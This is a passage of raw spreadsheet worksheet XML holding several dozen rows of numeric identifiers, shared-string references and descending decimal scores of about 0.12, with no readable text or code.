        <v>3.6421126E7</v>
      </c>
      <c r="C8567" s="2" t="s">
        <v>8156</v>
      </c>
      <c r="D8567" s="2">
        <v>1.0</v>
      </c>
      <c r="E8567" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8567" s="2">
        <v>0.1241319444444445</v>
      </c>
    </row>
    <row r="8568" ht="15.75" customHeight="1">
      <c r="A8568" s="1">
        <v>8168.0</v>
      </c>
      <c r="B8568" s="2">
        <v>5.3213744E7</v>
      </c>
      <c r="C8568" s="2" t="s">
        <v>8157</v>
      </c>
      <c r="D8568" s="2">
        <v>1.0</v>
      </c>
      <c r="E8568" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8568" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="8569" ht="15.75" customHeight="1">
      <c r="A8569" s="1">
        <v>24288.0</v>
      </c>
      <c r="B8569" s="2">
        <v>1.0557879E7</v>
      </c>
      <c r="C8569" s="2" t="s">
        <v>8158</v>
      </c>
      <c r="D8569" s="2">
        <v>1.0</v>
      </c>
      <c r="E8569" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8569" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="8570" ht="15.75" customHeight="1">
      <c r="A8570" s="1">
        <v>4729.0</v>
      </c>
      <c r="B8570" s="2">
        <v>4.3324453E7</v>
      </c>
      <c r="C8570" s="2" t="s">
        <v>8159</v>
      </c>
      <c r="D8570" s="2">
        <v>1.0</v>
      </c>
      <c r="E8570" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8570" s="2">
        <v>0.123931623931624</v>
      </c>
    </row>
    <row r="8571" ht="15.75" customHeight="1">
      <c r="A8571" s="1">
        <v>31183.0</v>
      </c>
      <c r="B8571" s="2">
        <v>4913324.0</v>
      </c>
      <c r="C8571" s="2" t="s">
        <v>8160</v>
      </c>
      <c r="D8571" s="2">
        <v>1.0</v>
      </c>
      <c r="E8571" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8571" s="2">
        <v>0.1239316239316239</v>
      </c>
    </row>
    <row r="8572" ht="15.75" customHeight="1">
      <c r="A8572" s="1">
        <v>4069.0</v>
      </c>
      <c r="B8572" s="2">
        <v>4.1165198E7</v>
      </c>
      <c r="C8572" s="2" t="s">
        <v>8161</v>
      </c>
      <c r="D8572" s="2">
        <v>1.0</v>
      </c>
      <c r="E8572" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8572" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="8573" ht="15.75" customHeight="1">
      <c r="A8573" s="1">
        <v>5896.0</v>
      </c>
      <c r="B8573" s="2">
        <v>4.7106438E7</v>
      </c>
      <c r="C8573" s="2" t="s">
        <v>8162</v>
      </c>
      <c r="D8573" s="2">
        <v>1.0</v>
      </c>
      <c r="E8573" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8573" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="8574" ht="15.75" customHeight="1">
      <c r="A8574" s="1">
        <v>8482.0</v>
      </c>
      <c r="B8574" s="2">
        <v>5.4028525E7</v>
      </c>
      <c r="C8574" s="2" t="s">
        <v>8163</v>
      </c>
      <c r="D8574" s="2">
        <v>1.0</v>
      </c>
      <c r="E8574" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8574" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="8575" ht="15.75" customHeight="1">
      <c r="A8575" s="1">
        <v>8635.0</v>
      </c>
      <c r="B8575" s="2">
        <v>5.4320794E7</v>
      </c>
      <c r="C8575" s="2" t="s">
        <v>8164</v>
      </c>
      <c r="D8575" s="2">
        <v>1.0</v>
      </c>
      <c r="E8575" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8575" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="8576" ht="15.75" customHeight="1">
      <c r="A8576" s="1">
        <v>8983.0</v>
      </c>
      <c r="B8576" s="2">
        <v>5.4962246E7</v>
      </c>
      <c r="C8576" s="2" t="s">
        <v>8165</v>
      </c>
      <c r="D8576" s="2">
        <v>1.0</v>
      </c>
      <c r="E8576" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8576" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="8577" ht="15.75" customHeight="1">
      <c r="A8577" s="1">
        <v>13639.0</v>
      </c>
      <c r="B8577" s="2">
        <v>3.5911928E7</v>
      </c>
      <c r="C8577" s="2" t="s">
        <v>8166</v>
      </c>
      <c r="D8577" s="2">
        <v>1.0</v>
      </c>
      <c r="E8577" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8577" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="8578" ht="15.75" customHeight="1">
      <c r="A8578" s="1">
        <v>14832.0</v>
      </c>
      <c r="B8578" s="2">
        <v>4.1013393E7</v>
      </c>
      <c r="C8578" s="2" t="s">
        <v>8167</v>
      </c>
      <c r="D8578" s="2">
        <v>1.0</v>
      </c>
      <c r="E8578" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8578" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="8579" ht="15.75" customHeight="1">
      <c r="A8579" s="1">
        <v>31766.0</v>
      </c>
      <c r="B8579" s="2">
        <v>5219083.0</v>
      </c>
      <c r="C8579" s="2" t="s">
        <v>8168</v>
      </c>
      <c r="D8579" s="2">
        <v>1.0</v>
      </c>
      <c r="E8579" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8579" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="8580" ht="15.75" customHeight="1">
      <c r="A8580" s="1">
        <v>31772.0</v>
      </c>
      <c r="B8580" s="2">
        <v>5219083.0</v>
      </c>
      <c r="C8580" s="2" t="s">
        <v>8169</v>
      </c>
      <c r="D8580" s="2">
        <v>1.0</v>
      </c>
      <c r="E8580" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8580" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="8581" ht="15.75" customHeight="1">
      <c r="A8581" s="1">
        <v>23271.0</v>
      </c>
      <c r="B8581" s="2">
        <v>5342497.0</v>
      </c>
      <c r="C8581" s="2" t="s">
        <v>8170</v>
      </c>
      <c r="D8581" s="2">
        <v>1.0</v>
      </c>
      <c r="E8581" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8581" s="2">
        <v>0.1237373737373738</v>
      </c>
    </row>
    <row r="8582" ht="15.75" customHeight="1">
      <c r="A8582" s="1">
        <v>25466.0</v>
      </c>
      <c r="B8582" s="2">
        <v>1.3986107E7</v>
      </c>
      <c r="C8582" s="2" t="s">
        <v>8171</v>
      </c>
      <c r="D8582" s="2">
        <v>1.0</v>
      </c>
      <c r="E8582" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8582" s="2">
        <v>0.1237373737373738</v>
      </c>
    </row>
    <row r="8583" ht="15.75" customHeight="1">
      <c r="A8583" s="1">
        <v>566.0</v>
      </c>
      <c r="B8583" s="2">
        <v>1.8994367E7</v>
      </c>
      <c r="C8583" s="2" t="s">
        <v>8172</v>
      </c>
      <c r="D8583" s="2">
        <v>1.0</v>
      </c>
      <c r="E8583" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8583" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="8584" ht="15.75" customHeight="1">
      <c r="A8584" s="1">
        <v>678.0</v>
      </c>
      <c r="B8584" s="2">
        <v>2.0268316E7</v>
      </c>
      <c r="C8584" s="2" t="s">
        <v>8173</v>
      </c>
      <c r="D8584" s="2">
        <v>1.0</v>
      </c>
      <c r="E8584" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8584" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="8585" ht="15.75" customHeight="1">
      <c r="A8585" s="1">
        <v>1538.0</v>
      </c>
      <c r="B8585" s="2">
        <v>2.7569445E7</v>
      </c>
      <c r="C8585" s="2" t="s">
        <v>8174</v>
      </c>
      <c r="D8585" s="2">
        <v>1.0</v>
      </c>
      <c r="E8585" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8585" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="8586" ht="15.75" customHeight="1">
      <c r="A8586" s="1">
        <v>1576.0</v>
      </c>
      <c r="B8586" s="2">
        <v>2.7730877E7</v>
      </c>
      <c r="C8586" s="2" t="s">
        <v>8175</v>
      </c>
      <c r="D8586" s="2">
        <v>1.0</v>
      </c>
      <c r="E8586" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8586" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="8587" ht="15.75" customHeight="1">
      <c r="A8587" s="1">
        <v>1626.0</v>
      </c>
      <c r="B8587" s="2">
        <v>2.7921209E7</v>
      </c>
      <c r="C8587" s="2" t="s">
        <v>8176</v>
      </c>
      <c r="D8587" s="2">
        <v>1.0</v>
      </c>
      <c r="E8587" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8587" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="8588" ht="15.75" customHeight="1">
      <c r="A8588" s="1">
        <v>2198.0</v>
      </c>
      <c r="B8588" s="2">
        <v>3.2027057E7</v>
      </c>
      <c r="C8588" s="2" t="s">
        <v>8177</v>
      </c>
      <c r="D8588" s="2">
        <v>1.0</v>
      </c>
      <c r="E8588" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8588" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="8589" ht="15.75" customHeight="1">
      <c r="A8589" s="1">
        <v>2361.0</v>
      </c>
      <c r="B8589" s="2">
        <v>3.322587E7</v>
      </c>
      <c r="C8589" s="2" t="s">
        <v>8178</v>
      </c>
      <c r="D8589" s="2">
        <v>1.0</v>
      </c>
      <c r="E8589" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8589" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="8590" ht="15.75" customHeight="1">
      <c r="A8590" s="1">
        <v>2420.0</v>
      </c>
      <c r="B8590" s="2">
        <v>3.3558644E7</v>
      </c>
      <c r="C8590" s="2" t="s">
        <v>8179</v>
      </c>
      <c r="D8590" s="2">
        <v>1.0</v>
      </c>
      <c r="E8590" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8590" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="8591" ht="15.75" customHeight="1">
      <c r="A8591" s="1">
        <v>2646.0</v>
      </c>
      <c r="B8591" s="2">
        <v>3.466161E7</v>
      </c>
      <c r="C8591" s="2" t="s">
        <v>8180</v>
      </c>
      <c r="D8591" s="2">
        <v>1.0</v>
      </c>
      <c r="E8591" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8591" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="8592" ht="15.75" customHeight="1">
      <c r="A8592" s="1">
        <v>3129.0</v>
      </c>
      <c r="B8592" s="2">
        <v>3.6853977E7</v>
      </c>
      <c r="C8592" s="2" t="s">
        <v>8181</v>
      </c>
      <c r="D8592" s="2">
        <v>1.0</v>
      </c>
      <c r="E8592" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8592" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="8593" ht="15.75" customHeight="1">
      <c r="A8593" s="1">
        <v>3526.0</v>
      </c>
      <c r="B8593" s="2">
        <v>3.8616768E7</v>
      </c>
      <c r="C8593" s="2" t="s">
        <v>8182</v>
      </c>
      <c r="D8593" s="2">
        <v>1.0</v>
      </c>
      <c r="E8593" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8593" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="8594" ht="15.75" customHeight="1">
      <c r="A8594" s="1">
        <v>4163.0</v>
      </c>
      <c r="B8594" s="2">
        <v>4.1520341E7</v>
      </c>
      <c r="C8594" s="2" t="s">
        <v>8183</v>
      </c>
      <c r="D8594" s="2">
        <v>1.0</v>
      </c>
      <c r="E8594" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8594" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="8595" ht="15.75" customHeight="1">
      <c r="A8595" s="1">
        <v>4358.0</v>
      </c>
      <c r="B8595" s="2">
        <v>4.2092767E7</v>
      </c>
      <c r="C8595" s="2" t="s">
        <v>8184</v>
      </c>
      <c r="D8595" s="2">
        <v>1.0</v>
      </c>
      <c r="E8595" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8595" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="8596" ht="15.75" customHeight="1">
      <c r="A8596" s="1">
        <v>4450.0</v>
      </c>
      <c r="B8596" s="2">
        <v>4.2402349E7</v>
      </c>
      <c r="C8596" s="2" t="s">
        <v>8185</v>
      </c>
      <c r="D8596" s="2">
        <v>1.0</v>
      </c>
      <c r="E8596" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8596" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="8597" ht="15.75" customHeight="1">
      <c r="A8597" s="1">
        <v>5109.0</v>
      </c>
      <c r="B8597" s="2">
        <v>4.4535097E7</v>
      </c>
      <c r="C8597" s="2" t="s">
        <v>8186</v>
      </c>
      <c r="D8597" s="2">
        <v>1.0</v>
      </c>
      <c r="E8597" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8597" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="8598" ht="15.75" customHeight="1">
      <c r="A8598" s="1">
        <v>5323.0</v>
      </c>
      <c r="B8598" s="2">
        <v>4.5297871E7</v>
      </c>
      <c r="C8598" s="2" t="s">
        <v>8187</v>
      </c>
      <c r="D8598" s="2">
        <v>1.0</v>
      </c>
      <c r="E8598" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8598" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="8599" ht="15.75" customHeight="1">
      <c r="A8599" s="1">
        <v>6464.0</v>
      </c>
      <c r="B8599" s="2">
        <v>4.8633527E7</v>
      </c>
      <c r="C8599" s="2" t="s">
        <v>8188</v>
      </c>
      <c r="D8599" s="2">
        <v>1.0</v>
      </c>
      <c r="E8599" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8599" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="8600" ht="15.75" customHeight="1">
      <c r="A8600" s="1">
        <v>7191.0</v>
      </c>
      <c r="B8600" s="2">
        <v>5.0573741E7</v>
      </c>
      <c r="C8600" s="2" t="s">
        <v>8189</v>
      </c>
      <c r="D8600" s="2">
        <v>1.0</v>
      </c>
      <c r="E8600" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8600" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="8601" ht="15.75" customHeight="1">
      <c r="A8601" s="1">
        <v>8047.0</v>
      </c>
      <c r="B8601" s="2">
        <v>5.2851682E7</v>
      </c>
      <c r="C8601" s="2" t="s">
        <v>8190</v>
      </c>
      <c r="D8601" s="2">
        <v>1.0</v>
      </c>
      <c r="E8601" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8601" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="8602" ht="15.75" customHeight="1">
      <c r="A8602" s="1">
        <v>9658.0</v>
      </c>
      <c r="B8602" s="2">
        <v>5.6297458E7</v>
      </c>
      <c r="C8602" s="2" t="s">
        <v>8191</v>
      </c>
      <c r="D8602" s="2">
        <v>1.0</v>
      </c>
      <c r="E8602" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8602" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="8603" ht="15.75" customHeight="1">
      <c r="A8603" s="1">
        <v>9846.0</v>
      </c>
      <c r="B8603" s="2">
        <v>5.6688162E7</v>
      </c>
      <c r="C8603" s="2" t="s">
        <v>8192</v>
      </c>
      <c r="D8603" s="2">
        <v>1.0</v>
      </c>
      <c r="E8603" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8603" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="8604" ht="15.75" customHeight="1">
      <c r="A8604" s="1">
        <v>10169.0</v>
      </c>
      <c r="B8604" s="2">
        <v>5.7360367E7</v>
      </c>
      <c r="C8604" s="2" t="s">
        <v>8193</v>
      </c>
      <c r="D8604" s="2">
        <v>1.0</v>
      </c>
      <c r="E8604" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8604" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="8605" ht="15.75" customHeight="1">
      <c r="A8605" s="1">
        <v>12698.0</v>
      </c>
      <c r="B8605" s="2">
        <v>3.076836E7</v>
      </c>
      <c r="C8605" s="2" t="s">
        <v>8194</v>
      </c>
      <c r="D8605" s="2">
        <v>1.0</v>
      </c>
      <c r="E8605" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8605" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="8606" ht="15.75" customHeight="1">
      <c r="A8606" s="1">
        <v>13005.0</v>
      </c>
      <c r="B8606" s="2">
        <v>3.2813116E7</v>
      </c>
      <c r="C8606" s="2" t="s">
        <v>8195</v>
      </c>
      <c r="D8606" s="2">
        <v>1.0</v>
      </c>
      <c r="E8606" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8606" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="8607" ht="15.75" customHeight="1">
      <c r="A8607" s="1">
        <v>14976.0</v>
      </c>
      <c r="B8607" s="2">
        <v>4.1376999E7</v>
      </c>
      <c r="C8607" s="2" t="s">
        <v>8196</v>
      </c>
      <c r="D8607" s="2">
        <v>1.0</v>
      </c>
      <c r="E8607" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8607" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="8608" ht="15.75" customHeight="1">
      <c r="A8608" s="1">
        <v>15018.0</v>
      </c>
      <c r="B8608" s="2">
        <v>4.1535538E7</v>
      </c>
      <c r="C8608" s="2" t="s">
        <v>8197</v>
      </c>
      <c r="D8608" s="2">
        <v>1.0</v>
      </c>
      <c r="E8608" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8608" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="8609" ht="15.75" customHeight="1">
      <c r="A8609" s="1">
        <v>15275.0</v>
      </c>
      <c r="B8609" s="2">
        <v>4.2385009E7</v>
      </c>
      <c r="C8609" s="2" t="s">
        <v>8198</v>
      </c>
      <c r="D8609" s="2">
        <v>1.0</v>
      </c>
      <c r="E8609" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8609" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="8610" ht="15.75" customHeight="1">
      <c r="A8610" s="1">
        <v>15358.0</v>
      </c>
      <c r="B8610" s="2">
        <v>4.2695701E7</v>
      </c>
      <c r="C8610" s="2" t="s">
        <v>8199</v>
      </c>
      <c r="D8610" s="2">
        <v>1.0</v>
      </c>
      <c r="E8610" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8610" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="8611" ht="15.75" customHeight="1">
      <c r="A8611" s="1">
        <v>15886.0</v>
      </c>
      <c r="B8611" s="2">
        <v>4.4554004E7</v>
      </c>
      <c r="C8611" s="2" t="s">
        <v>8200</v>
      </c>
      <c r="D8611" s="2">
        <v>1.0</v>
      </c>
      <c r="E8611" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8611" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="8612" ht="15.75" customHeight="1">
      <c r="A8612" s="1">
        <v>16439.0</v>
      </c>
      <c r="B8612" s="2">
        <v>4.6373768E7</v>
      </c>
      <c r="C8612" s="2" t="s">
        <v>8201</v>
      </c>
      <c r="D8612" s="2">
        <v>1.0</v>
      </c>
      <c r="E8612" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8612" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="8613" ht="15.75" customHeight="1">
      <c r="A8613" s="1">
        <v>16786.0</v>
      </c>
      <c r="B8613" s="2">
        <v>4.7739505E7</v>
      </c>
      <c r="C8613" s="2" t="s">
        <v>8202</v>
      </c>
      <c r="D8613" s="2">
        <v>1.0</v>
      </c>
      <c r="E8613" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8613" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="8614" ht="15.75" customHeight="1">
      <c r="A8614" s="1">
        <v>16795.0</v>
      </c>
      <c r="B8614" s="2">
        <v>4.7763973E7</v>
      </c>
      <c r="C8614" s="2" t="s">
        <v>8203</v>
      </c>
      <c r="D8614" s="2">
        <v>1.0</v>
      </c>
      <c r="E8614" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8614" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="8615" ht="15.75" customHeight="1">
      <c r="A8615" s="1">
        <v>17882.0</v>
      </c>
      <c r="B8615" s="2">
        <v>5.104359E7</v>
      </c>
      <c r="C8615" s="2" t="s">
        <v>8204</v>
      </c>
      <c r="D8615" s="2">
        <v>1.0</v>
      </c>
      <c r="E8615" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8615" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="8616" ht="15.75" customHeight="1">
      <c r="A8616" s="1">
        <v>18364.0</v>
      </c>
      <c r="B8616" s="2">
        <v>5.2557661E7</v>
      </c>
      <c r="C8616" s="2" t="s">
        <v>8205</v>
      </c>
      <c r="D8616" s="2">
        <v>1.0</v>
      </c>
      <c r="E8616" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8616" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="8617" ht="15.75" customHeight="1">
      <c r="A8617" s="1">
        <v>20460.0</v>
      </c>
      <c r="B8617" s="2">
        <v>1.2685999E7</v>
      </c>
      <c r="C8617" s="2" t="s">
        <v>8206</v>
      </c>
      <c r="D8617" s="2">
        <v>1.0</v>
      </c>
      <c r="E8617" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8617" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="8618" ht="15.75" customHeight="1">
      <c r="A8618" s="1">
        <v>22155.0</v>
      </c>
      <c r="B8618" s="2">
        <v>3.1313844E7</v>
      </c>
      <c r="C8618" s="2" t="s">
        <v>8207</v>
      </c>
      <c r="D8618" s="2">
        <v>1.0</v>
      </c>
      <c r="E8618" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8618" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="8619" ht="15.75" customHeight="1">
      <c r="A8619" s="1">
        <v>23299.0</v>
      </c>
      <c r="B8619" s="2">
        <v>5.4001784E7</v>
      </c>
      <c r="C8619" s="2" t="s">
        <v>8208</v>
      </c>
      <c r="D8619" s="2">
        <v>1.0</v>
      </c>
      <c r="E8619" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8619" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="8620" ht="15.75" customHeight="1">
      <c r="A8620" s="1">
        <v>24296.0</v>
      </c>
      <c r="B8620" s="2">
        <v>1.0561467E7</v>
      </c>
      <c r="C8620" s="2" t="s">
        <v>8209</v>
      </c>
      <c r="D8620" s="2">
        <v>1.0</v>
      </c>
      <c r="E8620" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8620" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="8621" ht="15.75" customHeight="1">
      <c r="A8621" s="1">
        <v>24984.0</v>
      </c>
      <c r="B8621" s="2">
        <v>1.2685998E7</v>
      </c>
      <c r="C8621" s="2" t="s">
        <v>8206</v>
      </c>
      <c r="D8621" s="2">
        <v>1.0</v>
      </c>
      <c r="E8621" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8621" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="8622" ht="15.75" customHeight="1">
      <c r="A8622" s="1">
        <v>25441.0</v>
      </c>
      <c r="B8622" s="2">
        <v>1.3875459E7</v>
      </c>
      <c r="C8622" s="2" t="s">
        <v>8210</v>
      </c>
      <c r="D8622" s="2">
        <v>1.0</v>
      </c>
      <c r="E8622" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8622" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="8623" ht="15.75" customHeight="1">
      <c r="A8623" s="1">
        <v>27772.0</v>
      </c>
      <c r="B8623" s="2">
        <v>2.3113671E7</v>
      </c>
      <c r="C8623" s="2" t="s">
        <v>8211</v>
      </c>
      <c r="D8623" s="2">
        <v>1.0</v>
      </c>
      <c r="E8623" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8623" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="8624" ht="15.75" customHeight="1">
      <c r="A8624" s="1">
        <v>29320.0</v>
      </c>
      <c r="B8624" s="2">
        <v>3.1313843E7</v>
      </c>
      <c r="C8624" s="2" t="s">
        <v>8212</v>
      </c>
      <c r="D8624" s="2">
        <v>1.0</v>
      </c>
      <c r="E8624" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8624" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="8625" ht="15.75" customHeight="1">
      <c r="A8625" s="1">
        <v>31487.0</v>
      </c>
      <c r="B8625" s="2">
        <v>5057482.0</v>
      </c>
      <c r="C8625" s="2" t="s">
        <v>8213</v>
      </c>
      <c r="D8625" s="2">
        <v>1.0</v>
      </c>
      <c r="E8625" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8625" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="8626" ht="15.75" customHeight="1">
      <c r="A8626" s="1">
        <v>32099.0</v>
      </c>
      <c r="B8626" s="2">
        <v>5.4001783E7</v>
      </c>
      <c r="C8626" s="2" t="s">
        <v>8208</v>
      </c>
      <c r="D8626" s="2">
        <v>1.0</v>
      </c>
      <c r="E8626" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8626" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="8627" ht="15.75" customHeight="1">
      <c r="A8627" s="1">
        <v>33678.0</v>
      </c>
      <c r="B8627" s="2">
        <v>8425292.0</v>
      </c>
      <c r="C8627" s="2" t="s">
        <v>8214</v>
      </c>
      <c r="D8627" s="2">
        <v>1.0</v>
      </c>
      <c r="E8627" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8627" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="8628" ht="15.75" customHeight="1">
      <c r="A8628" s="1">
        <v>18385.0</v>
      </c>
      <c r="B8628" s="2">
        <v>5.2591412E7</v>
      </c>
      <c r="C8628" s="2" t="s">
        <v>8215</v>
      </c>
      <c r="D8628" s="2">
        <v>1.0</v>
      </c>
      <c r="E8628" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8628" s="2">
        <v>0.1235489220563848</v>
      </c>
    </row>
    <row r="8629" ht="15.75" customHeight="1">
      <c r="A8629" s="1">
        <v>4030.0</v>
      </c>
      <c r="B8629" s="2">
        <v>4.100596E7</v>
      </c>
      <c r="C8629" s="2" t="s">
        <v>8216</v>
      </c>
      <c r="D8629" s="2">
        <v>1.0</v>
      </c>
      <c r="E8629" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8629" s="2">
        <v>0.1233521657250471</v>
      </c>
    </row>
    <row r="8630" ht="15.75" customHeight="1">
      <c r="A8630" s="1">
        <v>5868.0</v>
      </c>
      <c r="B8630" s="2">
        <v>4.7005838E7</v>
      </c>
      <c r="C8630" s="2" t="s">
        <v>8217</v>
      </c>
      <c r="D8630" s="2">
        <v>1.0</v>
      </c>
      <c r="E8630" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8630" s="2">
        <v>0.1233521657250471</v>
      </c>
    </row>
    <row r="8631" ht="15.75" customHeight="1">
      <c r="A8631" s="1">
        <v>13112.0</v>
      </c>
      <c r="B8631" s="2">
        <v>3.3577786E7</v>
      </c>
      <c r="C8631" s="2" t="s">
        <v>8218</v>
      </c>
      <c r="D8631" s="2">
        <v>1.0</v>
      </c>
      <c r="E8631" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8631" s="2">
        <v>0.1233521657250471</v>
      </c>
    </row>
    <row r="8632" ht="15.75" customHeight="1">
      <c r="A8632" s="1">
        <v>5392.0</v>
      </c>
      <c r="B8632" s="2">
        <v>4.5459857E7</v>
      </c>
      <c r="C8632" s="2" t="s">
        <v>8219</v>
      </c>
      <c r="D8632" s="2">
        <v>1.0</v>
      </c>
      <c r="E8632" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8632" s="2">
        <v>0.1231481481481481</v>
      </c>
    </row>
    <row r="8633" ht="15.75" customHeight="1">
      <c r="A8633" s="1">
        <v>18429.0</v>
      </c>
      <c r="B8633" s="2">
        <v>5.2716174E7</v>
      </c>
      <c r="C8633" s="2" t="s">
        <v>8220</v>
      </c>
      <c r="D8633" s="2">
        <v>1.0</v>
      </c>
      <c r="E8633" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8633" s="2">
        <v>0.1231481481481481</v>
      </c>
    </row>
    <row r="8634" ht="15.75" customHeight="1">
      <c r="A8634" s="1">
        <v>1998.0</v>
      </c>
      <c r="B8634" s="2">
